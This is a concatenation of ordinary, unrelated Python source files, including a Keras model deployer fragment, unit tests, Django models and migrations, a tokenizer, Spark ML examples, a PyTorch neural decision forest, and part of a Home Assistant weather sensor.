image") base_image = "{}/keras35-container:{}".format( __registry__, __version__) elif py_minor_version == (3, 6): logger.info("Using Python 3.6 base image") base_image = "{}/keras36-container:{}".format( __registry__, __version__) else: msg = ( "Keras deployer only supports Python 2.7, 3.5, and 3.6. " "Detected {major}.{minor}").format( major=sys.version_info.major, minor=sys.version_info.minor) logger.error(msg) # Remove temp files shutil.rmtree(serialization_dir) raise ClipperException(msg) # Deploy model clipper_conn.build_and_deploy_model( name, version, input_type, serialization_dir, base_image, labels, registry, num_replicas, batch_size, pkgs_to_install) # Remove temp files shutil.rmtree(serialization_dir) <reponame>mozhumz/machine_learning_py<filename>tf_learn/weight_train/hyjTest.py import tensorflow as tf x = tf.constant([[1., 1.], [2., 2.]]) ss=tf.reduce_mean(x) with tf.Session() as sess: print(sess.run(ss)) import unittest import sys import os import json from gadio.text import text as text from gadio.models.radio import Radio class TestDependency(unittest.TestCase): def test_dependency(self): import math import os import sys import cv2 import numpy as np from cv2 import VideoWriter, VideoWriter_fourcc import moviepy.editor from PIL import Image, ImageDraw, ImageFont import gadio.configs import gadio.crawlers import gadio.media import gadio.models import gadio.text class TestText(unittest.TestCase): def test_find_suffix(self): self.assertEqual('.jpg', text.find_image_suffix('1.jpg')) self.assertEqual('.jpg', text.find_image_suffix('1.1.jpg')) self.assertEqual('', text.find_image_suffix(None)) def test_is_alpha(self): self.assertTrue(text.is_alpha("Hello")) self.assertFalse(text.is_alpha("12Hello")) self.assertFalse(text.is_alpha("是的")) def test_is_alnum(self): self.assertTrue(text.is_alnum('A')) self.assertFalse(text.is_alnum('.')) self.assertTrue(text.is_alnum('1')) self.assertFalse(text.is_alnum('是')) def test_seconds_to_time(self): self.assertEqual("00:00", text.seconds_to_time(0)) self.assertEqual("01:00", text.seconds_to_time(60)) self.assertEqual("-00:01", text.seconds_to_time(-1)) self.assertEqual("-00:01", text.seconds_to_time("a")) self.assertEqual("1:00:01", text.seconds_to_time(3601)) self.assertEqual("2:46:40", text.seconds_to_time(10000)) """ class RadioTest(unittest.TestCase): def test_radio(self): parsed_json = object with open(os.sep.join(['.', 'test', 'radio.json']), 'r', encoding='utf-8') as f: parsed_json = json.loads(f.read()) radio = Radio.load_from_json(parsed_json) self.assertEqual('112725', radio.radio_id) self.assertEqual('我们为何如此喜爱Metroidvania游戏', radio.title) self.assertEqual(81, len(radio.timeline)) self.assertEqual(4, len(radio.users)) if (0 in radio.timeline.keys()): self.assertTrue(len(radio.timestamps) == len(radio.timeline) + 1) else: self.assertTrue(len(radio.timestamps) == len(radio.timeline) + 2) """ if __name__ == "__main__": unittest.main() <gh_stars>10-100 # Generated by Django 3.1.6 on 2021-04-25 11:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('profileapp', '0001_initial'), ] operations = [ migrations.CreateModel( name='Document', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('document_name', models.CharField(max_length=20)), ('document_color', models.CharField(max_length=20)), ('document_map', models.CharField(max_length=100)), ('document_date', models.DateTimeField(auto_now_add=True)), ('document_liked', models.IntegerField(default=0)), ('document_private', models.BooleanField(default=False)), ('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_profile', to='profileapp.profile')), ('profile_friend', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_profile_friend', to='profileapp.profile')), ], ), ] <gh_stars>0 import unittest import time from pidevices.sensors.cytron_line_sensor_lss05_rpigpio import CytronLfLSS05Rpi class TestCytronLf(unittest.TestCase): def test_start(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) number = 1 self.assertEqual(lf.so_1, number, "Should be {}".format(number)) number = 2 self.assertEqual(lf.so_2, number, "Should be {}".format(number)) number = 3 self.assertEqual(lf.so_3, number, "Should be {}".format(number)) number = 4 self.assertEqual(lf.so_4, number, "Should be {}".format(number)) number = 5 self.assertEqual(lf.so_5, number, "Should be {}".format(number)) number = 6 self.assertEqual(lf.cal, number, "Should be {}".format(number)) lf.stop() def test_mode(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) print("Bright mode") lf.mode = 'bright' time.sleep(5) print("Dark mode") lf.mode = 'dark' lf.stop() def test_calibrate(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) lf.calibrate() def test_read(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) for i in range(20): print(lf.read()) time.sleep(1) if __name__ == "__main__": unittest.main() """!Tokenizer for the produtil.testing.parser module.""" import re import produtil.testing.utilities __all__=[ 'Token', 'end_of_line_type', 'end_of_text_type', 'Tokenizer', 'TokenizeFile' ] class Token(object): """!Represents one token in the tokenized version of a file.""" ##@var token_type # The type of token, a string ##@var token_value # The text that was tokenized, a string. ##@var filename # The file from which this token originates, a string. The # special value produtil.testing.utilities.unknown_file indicates # the file is unknown or the token is not from a file. ##@var lineno # The line from file filename fron which this token originates, an integer. # The special value -1 means the line is unknown. def __init__(self,token_type,token_value,filename,lineno): """!Constructor for Token @param token_type The type of token, a string @param token_value The text this token represents, a string. @param filename The name of the file from which this token originates or produtil.testing.utilities.unknown_file if unknown. @param lineno The integer line number, counting from 1, from which this token originates. Multi-line tokens should have a line number representative of the region the token originates, preferably on its first line. If the token is not from a file, the value should be -1.""" super(Token,self).__init__() self.token_type=token_type self.filename=filename self.lineno=lineno self.token_value=token_value def __repr__(self): """!A string representation of this token suitable for debugging. @returns Python code that would construct this token.""" return 'Token(%s,%s,%s,%s)'%( repr(self.token_type),repr(self.token_value), repr(self.filename),repr(self.lineno)) def __str__(self): """!A human-readable string representation of this token. @returns Python code that would construct this token.""" return 'Token(%s,%s,%s,%s)'%( repr(self.token_type),repr(self.token_value), repr(self.filename),repr(self.lineno)) ##@var end_of_line_type # The token_type parameter to send to Token.__init__() to indicate the # end of a line end_of_line_type='\n' ##@var end_of_text_type # The token_type parameter to send to Token.__init__() to indicate the # end of a file or string. end_of_text_type='' class Tokenizer(object): """!Tokenizes a file, turning it into a stream of Token objects for parsing.""" ##@var re # A compiled regular expression used to tokenize the file. def copy(self): """!Duplicates this object At present, a Tokenizer has no internal state information. Hence, this is equivalent to Tokenizer(). This may change in the future. Hence, if you want to copy a Tokenizer, you should use the copy() function. @returns A new empty Tokenizer.""" return Tokenizer() def __init__(self): """!Constructor for Tokenizer""" super(Tokenizer,self).__init__() #yell('compile\n') self.re=re.compile(r'''(?xs) ( (?P<comment> \# [^\r\n]+ (?: \r | \n )+ ) | (?P<commentend> \# [^\r\n]+ | \# ) $ | (?P<varname> [A-Za-z_] [A-Za-z_0-9.@]* (?: % [A-Za-z_][A-Za-z_0-9.@]* )* ) | (?P<hash>\#) | (?P<number> [+-]? [0-9]+\.[0-9]+ (?: [eE] [+-]? [0-9]+ )? | [+-]? \.[0-9]+ (?: [eE] [+-]? [0-9]+ )? | [+-]? [0-9]+\. (?: [eE] [+-]? [0-9]+ )? | [+-]? [0-9]+ (?: [eE] [+-]? [0-9]+ )? ) | (?P<empty_qstring> '' ) | (?P<empty_dqstring> "" ) | ' (?P<qstring> (?: [^'\\] | ( \\ . )+ ) * ) ' | " (?P<dqstring> (?: [^"\\] | ( \\ . )+ ) * ) " | \[\[\[ (?P<bracestring> (?: [^\]@] | @ (?!\[) | @ \[ @ \] | @ \[ ' [^']+ ' \] | @ \[ [^\]]+ \] | \]\] (?!\]) | \] (?!\]) ) *? ) \]\]\] | (?P<endline>[ \t]* [\r\n]+) | (?P<equalequal> == ) | (?P<equal> = ) | (?P<astrisk> \* ) | (?P<whitespace> [ \t]+ ) | (?P<lset>\{) | (?P<rset>\}) | (?P<lfort>\(/) | (?P<rfort>/\)) | (?P<lparen>\() | (?P<rparen>\)) | (?P<comma>,) | (?P<colon>:) | (?P<at>@) | (?P<oper>\.[a-zA-Z_][a-zA-Z0-9_.]*\.) | <=+ (?P<filter>[a-zA-Z_][a-zA-Z0-9_.]*) =+ | (?P<error> . ) )''') def tokenize(self,text,filename=produtil.testing.utilities.unknown_file, first_line=1): """!Tokenizes the specified file, acting as an iterator over Token objects. Loops over the text of the given file, creating Token objects and yielding them. @param text The text to tokenize. @param filename The file from which the text originates. This may be used for two purposes. The first is error reporting, and the second is "load" statements, which load files relative to the path to the current file. @param first_line The line number for the first line of the file.""" lineno=first_line for m in self.re.finditer(text): if m is None: raise ValueError('SHOULD NOT GET HERE: no match on "%s"'%(line,)) # else: # for dkey,dval in m.groupdict().iteritems(): # if dval is not None: # yell("%10s = %s\n"%(dkey,repr(dval))) if m.group('comment'): yield Token(end_of_line_type,m.group('comment'), filename,lineno) elif m.group('commentend'): yield Token(end_of_line_type,m.group('commentend'), filename,lineno) elif m.group('hash'): yield Token(end_of_line_type,m.group('commentend'), filename,lineno) elif m.group('endline'): yield Token(end_of_line_type,m.group('endline'), filename,lineno) elif m.group('oper'): yield Token('oper',m.group('oper'),filename,lineno) elif m.group('filter'): yield Token('oper','.'+m.group('filter')+'.',filename,lineno) elif m.group('varname'): yield Token('varname',m.group('varname'),filename,lineno) elif m.group('number'): yield Token('number',m.group('number'),filename,lineno) elif m.group('empty_qstring'): yield Token('qstring','',filename,lineno) elif m.group('empty_dqstring'): yield Token('dqstring','',filename,lineno) elif m.group('qstring'): yield Token('qstring',m.group('qstring'),filename,lineno) elif m.group('dqstring'): yield Token('dqstring',m.group('dqstring'),filename,lineno) elif m.group('bracestring'): yield Token('bracestring',m.group('bracestring'), filename,lineno) elif m.group('at'): yield Token('@','@',filename,lineno) elif m.group('equalequal'): yield Token('==','==',filename,lineno) elif m.group('equal'): yield Token('=','=',filename,lineno) elif m.group('comma'): yield Token(',',',',filename,lineno) elif m.group('colon'): yield Token(':',':',filename,lineno) elif m.group('lset'): yield Token('{','{',filename,lineno) elif m.group('rset'): yield Token('}','}',filename,lineno) elif m.group('lparen'): yield Token('(','(',filename,lineno) elif m.group('rparen'): yield Token(')',')',filename,lineno) elif m.group('lfort'): yield Token('(/','(/',filename,lineno) elif m.group('rfort'): yield Token('/)','/)',filename,lineno) elif m.group('whitespace'): pass # Ignore whitespace outside strings else: raise ValueError('%s:%d: invalid text %s'%( filename,lineno,repr(m.group(0)))) lineno+=m.group(0).count('\n') yield Token(end_of_text_type,'',filename,lineno) class TokenizeFile(object): """!Wrapper around a Tokenizer for a specified file. This is a convenience class; it is a wrapper around a Tokenizer, but also knows how to create new TokenizeFile objects for the same type of underlyting Tokenizer objects (for_file()).""" ##@var tokenizer # The Tokenizer object that turns text into sequences of Token objects. ##@var fileobj # A file-like object that produces text for the tokenizer ##@var filename # The name of the file that fileobj reads. ##@var first_line # The integer first line of the file, usually 1. def __init__(self,tokenizer,fileobj, filename=produtil.testing.utilities.unknown_file, first_line=1): """!Constructor for TokenizeFile @param tokenizer The Tokenizer-like object to parse. @param fileobj The opened file-like object to read. @param filename The file from which the text originates. This may be used for two purposes. The first is error reporting, and the second is "load" statements, which load files relative to the path to the current file. @param first_line The line number for the first line of the file.""" self.tokenizer=tokenizer self.fileobj=fileobj self.filename=filename self.first_line=first_line def for_file(self,fileobj,filename,first_line=1): """!Creates a new TokenizeFile object for the specified file. @param fileobj The file-like object to read. @param filename The file from which the text originates. This may be used for two purposes. The first is error reporting, and the second is "load" statements, which load files relative to the path to the current file. @param first_line The line number for the first line of the file.""" return TokenizeFile(self.tokenizer.copy(),fileobj,filename,first_line) def __iter__(self): """!Iterates over tokens in self.fileobj.""" text=self.fileobj.read() for token in self.tokenizer.tokenize( text,self.filename,self.first_line): yield token import sales_schema base_path="../../data/sales/" stores=sc.textFile(base_path+"stores*.txt").map(lambda x:sales_schema.Store().parse(x)) sales=sc.textFile(base_path+"sales_*.txt").map(lambda x:sales_schema.SaleRow().parse(x)) # -*- coding: utf-8 -*- """ TencentBlueKing is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available. Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import json import zlib from django.db import models from django.utils.translation import ugettext_lazy as _ from common.constants import CHAT_BOT_TYPE_DEFAULT from common.constants import CHAT_BOT_TYPES from common.constants import TAK_PLATFORM_JOB from common.constants import TASK_EXECUTE_STATUS_CHOICES from common.constants import TASK_PLATFORM_CHOICES from module_biz.models import BaseModel class CompressJSONField(models.BinaryField): def __init__(self, compress_level=6, *args, **kwargs): super().__init__(*args, **kwargs) self.compress_level = compress_level def get_prep_value(self, value): value = super().get_prep_value(value) return zlib.compress(json.dumps(value).encode("utf-8"), self.compress_level) def to_python(self, value): value = super().to_python(value) return json.loads(zlib.decompress(value).decode("utf-8")) def from_db_value(self, value, expression, connection, context): return self.to_python(value) class Bot(BaseModel): """ 机器人 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) biz_name = models.CharField(_("业务名称"), default="", max_length=128) bot_id = models.CharField(_("机器人ID"), default="", max_length=128) bot_name = models.CharField(_("机器人名称"), default="", max_length=128) bot_type = models.CharField( _("机器人类型"), default=CHAT_BOT_TYPE_DEFAULT, max_length=128, choices=CHAT_BOT_TYPES, ) config = CompressJSONField(verbose_name=_("机器人配置"), default={}) class Meta: verbose_name = _("【机器人】") verbose_name_plural = _("【机器人】") @classmethod def create_bot(cls, **kwargs): """ 创建机器人 """ return cls.objects.get_or_create(**kwargs) @classmethod def query_bot_list(cls, **kwargs): """ 获取机器人 """ return list(cls.objects.filter(**kwargs).order_by("-id").values()) @classmethod def update_bot(cls, bot_id, **kwargs): """ 更新机器人 """ cls.objects.filter(pk=bot_id).update(**kwargs) @classmethod def bulb_update_bot(cls, bot_ids, **kwargs): """ 批量更新机器人 """ cls.objects.filter(pk__in=bot_ids).update(**kwargs) class Intent(BaseModel): """ 用户意图 """ index_id = models.BigIntegerField(_("索引ID"), default=-1) biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) intent_name = models.CharField(_("技能名称"), default="", max_length=128) status = models.BooleanField(_("意图状态"), default=True) available_user = CompressJSONField(verbose_name=_("可执行用户"), default=[]) available_group = CompressJSONField(verbose_name=_("可执行群组"), default=[]) is_commit = models.BooleanField(_("执行确认"), default=True) class Meta: verbose_name = _("【意图】") verbose_name_plural = _("【意图】") @classmethod def query_intent_list(cls, **kwargs): """ 获取意图 """ return list(cls.objects.filter(**kwargs).order_by("-id").values()) @classmethod def create_intent(cls, **kwargs): """ 创建意图 """ return cls.objects.get_or_create(**kwargs) @classmethod def update_intent(cls, intent_id, **kwargs): """ 更新意图 """ cls.objects.filter(pk=intent_id).update(**kwargs) @classmethod def bulk_update_intent(cls, intent_ids, **kwargs): """ 批量更新意图 """ cls.objects.filter(pk__in=intent_ids).update(**kwargs) class Utterances(BaseModel): """ 语料信息 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) index_id = models.BigIntegerField(_("索引ID"), default=-1) content = CompressJSONField(verbose_name=_("语料列表"), default=[]) class Meta: verbose_name = "【语料库】" verbose_name_plural = "【语料库】" @classmethod def query_utterances(cls, **kwargs): """ 获取语料 """ return list(cls.objects.filter(**kwargs).values()) @classmethod def create_utterance(cls, **kwargs): """ 创建语料 """ cls.objects.create(**kwargs) @classmethod def update_utterance(cls, intent_id, **kwargs): """ 更新语料 """ cls.objects.filter(index_id=intent_id).update(**kwargs) class Task(BaseModel): """ 任务 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) index_id = models.BigIntegerField(_("索引ID"), default=-1) platform = models.CharField( _("平台名称"), default=TAK_PLATFORM_JOB, max_length=128, choices=TASK_PLATFORM_CHOICES, ) task_id = models.CharField( _("任务ID"), default=TAK_PLATFORM_JOB, max_length=128, ) activities = CompressJSONField(verbose_name=_("节点信息"), default=[]) slots = CompressJSONField(verbose_name=_("槽位信息"), default=[]) source = CompressJSONField(verbose_name=_("任务元数据"), default={}) script = models.TextField(_("执行脚本信息"), default="") class Meta: verbose_name = _("【任务信息】") verbose_name_plural = _("【任务信息】") @classmethod def query_task_list(cls, **kwargs): """ 获取任务列表 """ return list(cls.objects.filter(**kwargs).values()) @classmethod def create_task(cls, **kwargs): """ 创建任务 """ cls.objects.create(**kwargs) @classmethod def update_task(cls, intent_id, **kwargs): """ 更新语料 """ cls.objects.filter(index_id=intent_id).update(**kwargs) class ExecutionLog(BaseModel): """ 执行日志 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) intent_id = models.BigIntegerField(_("意图ID"), default=-1) intent_name = models.CharField(_("技能名称"), default="", max_length=128) bot_name = models.CharField(_("机器人名称"), default="", max_length=128) bot_type = models.CharField(_("机器人类型"), default="default", max_length=128) platform = models.CharField(_("平台名称"), default="JOB", max_length=128) task_id = models.CharField(_("任务ID"), default="JOB", max_length=128) sender = models.CharField(_("执行人"), default="", max_length=128) msg = models.TextField(_("调用信息"), default="") status = models.CharField( _("任务状态"), default="0", max_length=128, choices=TASK_EXECUTE_STATUS_CHOICES, ) start_time = models.CharField(_("开始时间"), default="", max_length=256) end_time = models.CharField(_("结束时间"), default="", max_length=256) class Meta: verbose_name = _("【任务日志】") verbose_name_plural = _("【任务日志】") @classmethod def query_log_list(cls, **kwargs): """ 获取日志列表 """ return list(cls.objects.filter(**kwargs).values()) @classmethod def create_log(cls, **kwargs): """ 创建日志 """ log = cls.objects.create(**kwargs) return log @classmethod def update_log(cls, log_id, **kwargs): """ 更新日志 """ cls.objects.filter(pk=log_id).update(**kwargs) from pyspark.sql import SparkSession from pyspark.ml import Pipeline from pyspark.ml.classification import LogisticRegression from pyspark.ml.feature import HashingTF, Tokenizer from pyspark.sql import Row def main(): # Prepare training documents from a list of (id, text, label) tuples. spark = SparkSession.builder.appName("MLpipeline").getOrCreate() LabeledDocument = Row("id", "text", "label") training = spark.createDataFrame([ (0L, "a b c d e spark", 1.0), (1L, "b d", 0.0), (2L, "spark f g h", 1.0), (3L, "hadoop mapreduce", 0.0)], ["id", "text", "label"]) # Configure an ML pipeline, which consists of tree stages: tokenizer, hashingTF, and lr. tokenizer = Tokenizer(inputCol="text", outputCol="words") hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features") lr = LogisticRegression(maxIter=10, regParam=0.01) pipeline = Pipeline(stages=[tokenizer, hashingTF, lr]) # Fit the pipeline to training documents. model = pipeline.fit(training) # Prepare test documents, which are unlabeled (id, text) tuples. test = spark.createDataFrame([ (4L, "spark i j k"), (5L, "l m n"), (6L, "mapreduce spark"), (7L, "apache hadoop")], ["id", "text"]) # Make predictions on test documents and print columns of interest. prediction = model.transform(test) selected = prediction.select("id", "text", "prediction") for row in selected.collect(): print(row) if __name__ == '__main__': main() <reponame>kkk669/VisualizingNDF<filename>src/age_estimation/ndf.py import resnet import torch import torch.nn as nn from torch.nn.parameter import Parameter from collections import OrderedDict import numpy as np # smallest positive float number FLT_MIN = float(np.finfo(np.float32).eps) FLT_MAX = float(np.finfo(np.float32).max) class FeatureLayer(nn.Sequential): def __init__(self, model_type = 'resnet34', num_output = 256, input_size = 224, pretrained = False, gray_scale = False): """ Args: model_type (string): type of model to be used. num_output (int): number of neurons in the last feature layer input_size (int): input image size pretrained (boolean): whether to use a pre-trained model from ImageNet gray_scale (boolean): whether the input is gray scale image """ super(FeatureLayer, self).__init__() self.model_type = model_type self.num_output = num_output if self.model_type == 'hybrid': # a model using a resnet-like backbone is used for feature extraction model = resnet.Hybridmodel(self.num_output) self.add_module('hybrid_model', model) else: raise NotImplementedError def get_out_feature_size(self): return self.num_output class Tree(nn.Module): def __init__(self, depth, feature_length, vector_length, use_cuda = True): """ Args: depth (int): depth of the neural decision tree. feature_length (int): number of neurons in the last feature layer vector_length (int): length of the mean vector stored at each tree leaf node use_cuda (boolean): whether to use GPU """ super(Tree, self).__init__() self.depth = depth self.n_leaf = 2 ** depth self.feature_length = feature_length self.vector_length = vector_length self.is_cuda = use_cuda onehot = np.eye(feature_length) # randomly use some neurons in the feature layer to compute decision function using_idx = np.random.choice(feature_length, self.n_leaf, replace=False) self.feature_mask = onehot[using_idx].T self.feature_mask = Parameter(torch.from_numpy(self.feature_mask).type(torch.FloatTensor),requires_grad=False) # a leaf node contains a mean vector and a covariance matrix self.mean = np.ones((self.n_leaf, self.vector_length)) # TODO: use k-means clusterring to perform leaf node initialization self.mu_cache = [] # use sigmoid function as the decision function self.decision = nn.Sequential(OrderedDict([ ('sigmoid', nn.Sigmoid()), ])) # used for leaf node update self.covmat = np.array([np.eye(self.vector_length) for i in range(self.n_leaf)]) # also stores the inverse of the covariant matrix for efficiency self.covmat_inv = np.array([np.eye(self.vector_length) for i in range(self.n_leaf)]) # also stores the determinant of the covariant matrix for efficiency self.factor = np.ones((self.n_leaf)) if not use_cuda: raise NotImplementedError else: self.mean = Parameter(torch.from_numpy(self.mean).type(torch.FloatTensor).cuda(), requires_grad=False) self.covmat = Parameter(torch.from_numpy(self.covmat).type(torch.FloatTensor).cuda(), requires_grad=False) self.covmat_inv = Parameter(torch.from_numpy(self.covmat_inv).type(torch.FloatTensor).cuda(), requires_grad=False) self.factor = Parameter(torch.from_numpy(self.factor).type(torch.FloatTensor).cuda(), requires_grad=False) def forward(self, x, save_flag = False): """ Args: param x (Tensor): input feature batch of size [batch_size, n_features] Return: (Tensor): routing probability of size [batch_size, n_leaf] """ cache = {} if x.is_cuda and not self.feature_mask.is_cuda: self.feature_mask = self.feature_mask.cuda() feats = torch.mm(x, self.feature_mask) decision = self.decision(feats) decision = torch.unsqueeze(decision,dim=2) decision_comp = 1-decision decision = torch.cat((decision,decision_comp),dim=2) # save some intermediate results for analysis if needed if save_flag: cache['decision'] = decision[:,:,0] batch_size = x.size()[0] mu = x.data.new(batch_size,1,1).fill_(1.) begin_idx = 1 end_idx = 2 for n_layer in range(0, self.depth): # mu stores the probability that a sample is routed to certain node # repeat it to be multiplied for left and right routing mu = mu.repeat(1, 1, 2) # the routing probability at n_layer _decision = decision[:, begin_idx:end_idx, :] # -> [batch_size,2**n_layer,2] mu = mu*_decision # -> [batch_size,2**n_layer,2] begin_idx = end_idx end_idx = begin_idx + 2 ** (n_layer+1) # merge left and right nodes to the same layer mu = mu.view(batch_size, -1, 1) mu = mu.view(batch_size, -1) if save_flag: cache['mu'] = mu return mu, cache else: return mu def pred(self, x): p = torch.mm(self(x), self.mean) return p def update_label_distribution(self, target_batch, check=False): """ fix the feature extractor of RNDF and update leaf node mean vectors and covariance matrices based on a multivariate gaussian distribution Args: param target_batch (Tensor): a batch of regression targets of size [batch_size, vector_length] """ target_batch = torch.cat(target_batch, dim = 0) mu = torch.cat(self.mu_cache, dim = 0) batch_size = len(mu) # no need for gradient computation with torch.no_grad(): leaf_prob_density = mu.data.new(batch_size, self.n_leaf) for leaf_idx in range(self.n_leaf): # vectorized code is used for efficiency temp = target_batch - self.mean[leaf_idx, :] leaf_prob_density[:, leaf_idx] = (self.factor[leaf_idx]*torch.exp(-0.5*(torch.mm(temp, self.covmat_inv[leaf_idx, :,:])*temp).sum(dim = 1))).clamp(FLT_MIN, FLT_MAX) # Tensor [batch_size, 1] nominator = (mu * leaf_prob_density).clamp(FLT_MIN, FLT_MAX) # [batch_size, n_leaf] denomenator = (nominator.sum(dim = 1).unsqueeze(1)).clamp(FLT_MIN, FLT_MAX) # add dimension for broadcasting zeta = nominator/denomenator # [batch_size, n_leaf] # new_mean if a weighted sum of all training samples new_mean = (torch.mm(target_batch.transpose(0, 1), zeta)/(zeta.sum(dim = 0).unsqueeze(0))).transpose(0, 1) # [n_leaf, vector_length] # allocate for new parameters new_covmat = new_mean.data.new(self.n_leaf, self.vector_length, self.vector_length) new_covmat_inv = new_mean.data.new(self.n_leaf, self.vector_length, self.vector_length) new_factor = new_mean.data.new(self.n_leaf) for leaf_idx in range(self.n_leaf): # new covariance matrix is a weighted sum of all covmats of each training sample weights = zeta[:, leaf_idx].unsqueeze(0) temp = target_batch - new_mean[leaf_idx, :] new_covmat[leaf_idx, :,:] = torch.mm(weights*(temp.transpose(0, 1)), temp)/(weights.sum()) # update cache (factor and inverse) for future use new_covmat_inv[leaf_idx, :,:] = new_covmat[leaf_idx, :,:].inverse() if check and new_covmat[leaf_idx, :,:].det() <= 0: print('Warning: singular matrix %d'%leaf_idx) new_factor[leaf_idx] = 1.0/max((torch.sqrt(new_covmat[leaf_idx, :,:].det())), FLT_MIN) # update parameters self.mean = Parameter(new_mean, requires_grad = False) self.covmat = Parameter(new_covmat, requires_grad = False) self.covmat_inv = Parameter(new_covmat_inv, requires_grad = False) self.factor = Parameter(new_factor, requires_grad = False) return class Forest(nn.Module): # a neural decision forest is an ensemble of neural decision trees def __init__(self, n_tree, tree_depth, feature_length, vector_length, use_cuda = False): super(Forest, self).__init__() self.trees = nn.ModuleList() self.n_tree = n_tree self.tree_depth = tree_depth self.feature_length = feature_length self.vector_length = vector_length for _ in range(n_tree): tree = Tree(tree_depth, feature_length, vector_length, use_cuda) self.trees.append(tree) def forward(self, x, save_flag = False): predictions = [] cache = [] for tree in self.trees: if save_flag: # record some intermediate results mu, cache_tree = tree(x, save_flag = True) p = torch.mm(mu, tree.mean) cache.append(cache_tree) else: p = tree.pred(x) predictions.append(p.unsqueeze(2)) prediction = torch.cat(predictions,dim=2) prediction = torch.sum(prediction, dim=2)/self.n_tree if save_flag: return prediction, cache else: return prediction class NeuralDecisionForest(nn.Module): def __init__(self, feature_layer, forest): super(NeuralDecisionForest, self).__init__() self.feature_layer = feature_layer self.forest = forest def forward(self, x, debug = False, save_flag = False): feats, reg_loss = self.feature_layer(x) if save_flag: # return some intermediate results pred, cache = self.forest(feats, save_flag = True) return pred, reg_loss, cache else: pred = self.forest(feats) return pred, reg_loss <reponame>boojew/home-assistant """ Support for Ambient Weather Station Service. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/sensor.ambient_station/ """ import asyncio from datetime import timedelta import logging import voluptuous as vol from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.const import CONF_API_KEY, CONF_MONITORED_CONDITIONS import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity import Entity from homeassistant.util import Throttle REQUIREMENTS = ['ambient_api==1.5.2'] CONF_APP_KEY = 'app_key' SENSOR_NAME = 0 SENSOR_UNITS = 1 CONF_UNITS = 'units' UNITS_US = 'us' UNITS_SI = 'si' UNIT_SYSTEM = {UNITS_US: 0, UNITS_SI: 1} SCAN_INTERVAL = timedelta(seconds=300) SENSOR_TYPES = { 'winddir': ['Wind Dir', '°'], 'windspeedmph': ['Wind Speed', 'mph'], 'windgustmph': ['Wind Gust', 'mph'], 'maxdailygust': ['Max Gust', 'mph'], 'windgustdir': ['Gust Dir', '°'], 'windspdmph_avg2m': ['Wind Avg 2m', 'mph'], 'winddir_avg2m': ['Wind Dir Avg 2m', 'mph'], 'windspdmph_avg10m': ['Wind Avg 10m', 'mph'], 'winddir_avg10m': ['Wind Dir Avg 10m', '°'], 'humidity': ['Humidity', '%'], 'humidityin': ['Humidity In', '%'], 'tempf': ['Temp', ['°F', '°C']], 'tempinf': ['Inside Temp', ['°F', '°C']], 'battout': ['Battery', ''], 'hourlyrainin': ['Hourly Rain Rate', 'in/hr'], 'dailyrainin': ['Daily Rain', 'in'], '24hourrainin': ['24 Hr Rain', 'in'], 'weeklyrainin': ['Weekly Rain', 'in'], 'monthlyrainin': ['Monthly Rain', 'in'], 'yearlyrainin': ['Yearly Rain', 'in'], 'eventrainin': ['Event Rain', 'in'], 'totalrainin': ['Lifetime Rain', 'in'], 'baromrelin': ['Rel Pressure', 'inHg'], 'baromabsin': ['Abs Pressure', 'inHg'], 'uv': ['uv', 'Index'], 'solarradiation': ['Solar Rad', 'W/m^2'], 'co2': ['co2', 'ppm'], 'lastRain': ['Last Rain', ''], 'dewPoint': ['Dew Point', ['°F', '°C']], 'feelsLike': ['Feels Like', ['°F', '°C']], } _LOGGER = logging.getLogger(__name__) PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_API_KEY): cv.string, vol.Required(CONF_APP_KEY): cv.string, vol.Required(CONF_MONITORED_CONDITIONS): vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]), vol.Optional(CONF_UNITS): vol.In([UNITS_SI, UNITS_US]), }) def setup_platform(hass, config, add_entities, discovery_info=None): """Initialze each sensor platform for each monitored condition.""" api_key = config[CONF_API_KEY] app_key = config[CONF_APP_KEY] station_data = AmbientStationData(hass, api_key, app_key) if not station_data.connect_success: _LOGGER.error("Could not connect to weather station API") return sensor_list = [] if CONF_UNITS in config: sys_units = config[CONF_UNITS] elif hass.config.units.is_metric: sys_units = UNITS_SI else: sys_units = UNITS_US for condition in config[CONF_MONITORED_CONDITIONS]: # create a sensor object for each monitored condition sensor_params = SENSOR_TYPES[condition] name = sensor_params[SENSOR_NAME] units = sensor_params[SENSOR_UNITS] if isinstance(units, list): units = sensor_params[SENSOR_UNITS][UNIT_SYSTEM[sys_units]] sensor_list.append(AmbientWeatherSensor(station_data, condition, name, units)) add_entities(sensor_list) class AmbientWeatherSensor(Entity): """Representation of a Sensor.""" def __init__(self, station_data, condition, name, units): """Initialize the sensor.""" self._state = None self.station_data = station_data self._condition = condition self._name = name self._units = units @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self._state @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._units async def async_update(self): """Fetch new state data for the sensor. This is the only method that should fetch new data for Home Assistant. """ 